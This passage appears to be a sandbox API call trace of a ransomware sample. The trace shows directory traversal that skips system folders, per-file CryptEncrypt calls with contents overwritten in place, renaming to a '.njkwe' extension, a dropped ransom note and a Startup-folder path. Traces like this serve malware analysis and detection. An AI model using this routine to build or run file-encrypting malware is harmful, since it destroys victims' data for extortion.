lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.208] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.209] GetTickCount () returned 0x114fbb7 [0061.209] GetTickCount () returned 0x114fbb7 [0061.209] GetTickCount () returned 0x114fbb7 [0061.209] GetTickCount () returned 0x114fbb7 [0061.209] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.209] GetProcessHeap () returned 0xbe0000 [0061.209] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.209] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x1ac3, lpOverlapped=0x0) returned 1 [0061.210] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffe53d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.210] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x1ac3, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x1ac3, lpOverlapped=0x0) returned 1 [0061.211] GetProcessHeap () returned 0xbe0000 [0061.211] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.211] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.211] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.211] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.211] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.211] CloseHandle (hObject=0x42c) returned 1 [0061.212] GetProcessHeap () returned 0xbe0000 [0061.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.212] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0061.212] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0061.214] GetProcessHeap () returned 0xbe0000 [0061.214] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.214] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1198c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.214] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0061.215] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0061.215] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0061.215] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0061.215] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0061.215] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 48 [0061.215] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0061.215] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.215] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0061.215] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.215] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.215] GetTickCount () returned 0x114fbb7 [0061.215] GetTickCount () returned 0x114fbb7 [0061.215] GetTickCount () returned 0x114fbb7 [0061.216] GetTickCount () returned 0x114fbb7 [0061.216] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.216] GetProcessHeap () returned 0xbe0000 [0061.216] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.216] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.218] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.218] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.218] GetProcessHeap () returned 0xbe0000 [0061.218] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.218] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.218] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.218] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.218] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.219] CloseHandle (hObject=0x42c) returned 1 [0061.221] GetProcessHeap () returned 0xbe0000 [0061.221] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.221] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0061.221] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0061.221] GetProcessHeap () returned 0xbe0000 [0061.221] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.221] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.221] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0061.221] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0061.221] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0061.221] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0061.221] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0061.221] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 49 [0061.221] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0061.221] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.222] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0061.222] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.222] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.228] GetTickCount () returned 0x114fbc6 [0061.228] GetTickCount () returned 0x114fbc6 [0061.228] GetTickCount () returned 0x114fbc6 [0061.228] GetTickCount () returned 0x114fbc6 [0061.228] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.228] GetProcessHeap () returned 0xbe0000 [0061.228] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.229] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.230] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.230] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.230] GetProcessHeap () returned 0xbe0000 [0061.230] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.230] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.231] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.231] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.231] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.231] CloseHandle (hObject=0x42c) returned 1 [0061.232] GetProcessHeap () returned 0xbe0000 [0061.232] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.232] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0061.232] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0061.232] GetProcessHeap () returned 0xbe0000 [0061.232] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.232] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0061.233] FindClose (in: hFindFile=0xc1a160 | out: hFindFile=0xc1a160) returned 1 [0061.233] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0061.233] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1037\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.233] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0061.234] CloseHandle (hObject=0x428) returned 1 [0061.234] GetProcessHeap () returned 0xbe0000 [0061.234] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0061.234] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1038", cAlternateFileName="")) returned 1 [0061.234] lstrcmpiW (lpString1="1038", lpString2="Windows") returned -1 [0061.234] lstrcmpiW (lpString1="1038", lpString2="$Recycle.bin") returned 1 [0061.234] lstrcmpiW (lpString1="1038", lpString2="System Volume Information") returned -1 [0061.234] lstrcmpiW (lpString1="1038", lpString2="Program Files") returned -1 [0061.234] lstrcmpiW (lpString1="1038", lpString2="Program Files (x86)") returned -1 [0061.234] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038") returned 30 [0061.234] lstrcmpW (lpString1="1038", lpString2=".") returned 1 [0061.234] lstrcmpW (lpString1="1038", lpString2="..") returned 1 [0061.234] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1038", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0061.234] GetProcessHeap () returned 0xbe0000 [0061.234] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0061.234] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\*") returned 32 [0061.234] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ca0 [0061.234] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.235] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.235] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.235] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.235] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.235] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\.") returned 32 [0061.235] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.235] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0061.235] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.235] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.235] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.235] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.235] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.235] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\..") returned 33 [0061.235] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.235] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.235] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x109e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.235] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0061.235] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0061.235] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0061.235] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0061.235] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0061.235] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 39 [0061.235] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0061.235] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.235] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0061.235] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.235] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.235] GetTickCount () returned 0x114fbc6 [0061.236] GetTickCount () returned 0x114fbc6 [0061.236] GetTickCount () returned 0x114fbc6 [0061.236] GetTickCount () returned 0x114fbc6 [0061.236] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.236] GetProcessHeap () returned 0xbe0000 [0061.236] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.236] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x109e, lpOverlapped=0x0) returned 1 [0061.237] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffef62, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.237] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x109e, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x109e, lpOverlapped=0x0) returned 1 [0061.238] GetProcessHeap () returned 0xbe0000 [0061.238] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.238] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.238] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.238] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.238] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.238] CloseHandle (hObject=0x42c) returned 1 [0061.239] GetProcessHeap () returned 0xbe0000 [0061.239] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.239] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0061.239] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0061.279] GetProcessHeap () returned 0xbe0000 [0061.279] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.280] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x151aa, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.280] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0061.280] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0061.280] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0061.280] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0061.280] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned 